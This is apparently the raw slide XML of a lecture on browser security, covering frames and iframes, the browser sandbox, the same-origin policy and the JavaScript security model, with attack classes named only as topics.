            </a:endParaRP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Integrity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Compromise your machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Install malware rootkit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Transact on your accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read your information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Steal passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Read your email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19461" name="Picture 7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905000"/>
            <a:ext cx="248126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Frame and iFrame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58371" name="Content Placeholder 2" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level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smtClean="0"/>
              <a:t>Window may contain frames from different sources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Frame: rigid division as part of frameset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>iFrame: floating inline frame</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>iFrame example</a:t>
            </a:r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r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Why use frames?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Delegate screen area to content from another source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Browser provides isolation based on frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Parent may work even if frame is broken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990600" y="3352800"/>
            <a:ext cx="6858000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Aft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>="hello.html" width=450 height=100&gt; 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sz="1800" dirty="0"/>
              <a:t>If you can see this, your browser doesn't understand IFRAME. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>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784F1C42-AC66-4039-99E4-846C0801E8B8}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128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Browser Sandbox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
            </a:endParaRP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Goal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Run remote web applications safely</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Limited access to OS, network, and browser data</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Approach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Isolate sites in different security contexts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Browser manages resources, like an OS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20485" name="Picture 6" descr="MCj029790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914400"/>
            <a:ext cx="2819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7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6713" y="279400"/>
            <a:ext cx="1284287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3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Analogy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47107" name="Text Placeholder 6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4040188" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Operating system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47108" name="Content Placeholder 4" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="2011363"/>
            <a:ext cx="4040188" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>System calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Processes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Principals: Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Discretionary access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Root exploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47109" name="Text Placeholder 7" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="1371600"/>
            <a:ext cx="4041775" cy="639763"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web browser</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47110" name="Content Placeholder 5" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4797425" y="2011363"/>
            <a:ext cx="4041775" cy="3951287"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Primitives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Document object model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Frames</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Principals: “Origins”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mandatory access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Injection attacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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Policy Goals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3277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Safe to visit an evil web site</a:t>
            </a:r>
          </a:p>
          <a:p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r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Safe to visit two pages at the same time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Address bar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>	distinguishes them</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Allow safe delegation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32772" name="Picture 3" descr="a.co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3100" y="2070100"/>
            <a:ext cx="18542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 descr="a.co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3943350"/>
            <a:ext cx="18542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4" descr="b.co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0200" y="3943350"/>
            <a:ext cx="18542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6" descr="ifram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3900" y="5410200"/>
            <a:ext cx="18542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9F0AF297-D4A0-5C46-A959-4F4A9264E21E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial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458200" cy="5181600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Big trend: software as a (Web-based) service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Online banking, shopping, government, bill payment, tax prep, customer relationship management, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Cloud computing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Applications hosted on Web servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Written in a mixture of PHP, Java, Perl, Python, C, ASP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Poorly written scripts with inadequate input validation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2338713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Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Browser security mechanism</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33795" name="Content Placeholder 2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228600" y="4465637"/>
            <a:ext cx="8686800" cy="2087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frame of a page has an origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Origin = protocol://host:port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Scripts in each frame </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>can access its own origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>etwork access, Read/write DOM, Storage (cookies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Frame cannot access data associated with a different origin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15" name="laptop"/>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="1447800"/>
            <a:ext cx="3657600" cy="2667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47800" y="1676400"/>
            <a:ext cx="99060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4724400" y="1312713"/>
            <a:ext cx="990600" cy="1104900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Can 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4740349" y="2733488"/>
            <a:ext cx="990600" cy="1104900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29800" y="2876729"/>
            <a:ext cx="762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14600" y="1676400"/>
            <a:ext cx="990600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81300" y="2057400"/>
            <a:ext cx="4953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</a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0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352799" y="2815540"/>
            <a:ext cx="1387549" cy="470398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 type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="41148"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V="1">
            <a:off x="3238499" y="1865163"/>
            <a:ext cx="1501849" cy="31750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 type="triangle" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="82296" tIns="41148" rIns="82296" bIns="4114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689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19"/>
            <a:ext cx="9143999" cy="835781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SOP questions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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247" y="1066800"/>
            <a:ext cx="8136468" cy="5486400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Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>get resources from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef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Can ‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>execute resources from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef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Can ‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>post content to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef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Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>interfere with the DOM of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef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Can ‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>redirect a browsing context of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘A’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>read cookies/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>‘B’?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef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52670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 Attacks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67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4BA141A1-FDD0-234C-AA80-0522FF35AEC6}" type="slidenum">
              <a:rPr lang="en-US" sz="1200">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRP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JavaScript Security Model</a:t>
            </a:r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8768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Script runs in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>sandbox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>direct file access, restricted network access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="Tahoma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Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Same</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>-origin policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>Can only read properties of documents and windows from the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>protocol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" smtClean="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" u="sng" dirty="0">
              <a:latin typeface="Tahoma" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>If the same server hosts unrelated sites, scripts from one site can access document properties on the other</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3012456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Library Import</a:t>
            </a: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Same-origin policy does </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Tahoma" charset="0"/>
              </a:rPr>
              <a:t> apply to scripts loaded in enclosing frame from arbitrary site</a:t>
